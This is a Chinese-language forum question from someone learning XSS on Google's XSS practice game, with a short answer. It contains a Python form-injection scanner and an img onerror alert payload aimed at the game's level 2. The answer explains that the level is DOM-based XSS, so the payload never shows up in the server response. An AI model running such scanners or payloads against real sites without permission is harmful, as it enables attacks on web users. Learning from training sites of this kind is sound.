我一直在学习XSS和为XSS构建的谷歌游戏
http://www.xss-game.appspot.com/level2/frame
我成功地找到了这一级别的解决方案,即将脚本包装在图像标记中,但我无法使用下面的python代码找到漏洞
from bs4 import BeautifulSoup
from bs4.element import Script
from requests_html import HTMLSession
from urllib.parse import urljoin
from bs4 import BeautifulSoup
session = HTMLSession()
def retrieve_all_forms(url):
r = session.get(url)
soup = BeautifulSoup(r.html.html,"html.parser")
return soup.find_all("form")
def retrieve_form_details(form):
form_details = {}
form_details["action"] = form.attrs.get("action").lower()
form_details["request_method"] = form.attrs.get("method","get").lower()
input_tags_info = []
for itag in form.find_all("input"):
type = itag.attrs.get("type", "text")
name = itag.attrs.get("name")
value = itag.attrs.get("value", "")
input_tags_info.append({"type":type,"name":name,"value":value})
for ttag in form.find_all("textarea"):
name = ttag.attrs.get("name")
value = ttag.attrs.get("value", "")
type = ttag.attrs.get("type", "text")
input_tags_info.append({"type":type,"name":name,"value":value})
form_details["inputs"] = input_tags_info
return form_details
def payload_insulation(form, payload):
for itag in form["inputs"]:
if itag["type"] !="hidden" and itag["type"] !="submit":
print(itag)
itag["value"] = payload
#print(form["inputs"])
return form
def submit_form(url,form,payload):
data ={}
#print(form["inputs"])
for itag in form["inputs"]:
data[itag["name"]] = itag["value"]
print(data)
if form["request_method"] == "post":
res = session.post(url, data=data)
elif form["request_method"] == "get":
res = session.get(url, params=data)
#print(res.text)
if payload in res.text:
return 1
else:
return 0
def form_xss(url,payload):
forms = retrieve_all_forms(url)
results = []
i=1
for form in forms:
form_details =retrieve_form_details(form)
form = payload_insulation(form_details,payload)
if submit_form(url,form,payload) == 1:
results.append((payload,True))
#print("="*50, f"form #{i}", "="*50)
#print(form_details)
return results
print(form_xss("http://www.xss-game.appspot.com/level2/frame",'<img src=x onerror="alert(String.fromCharCode(88,83,83))"/>'))
我一直试图通过post发送数据,但img标记没有出现在响应中。有人能告诉我这段代码缺少什么吗?谢谢
使用JavaScript从本地存储读取帖子,如页面源中所示:
因此,它是一个基于DOM的XSS,在响应中不包含标记,因为它需要JavaScript和本地存储来运行
相关问题 更多 >
编程相关推荐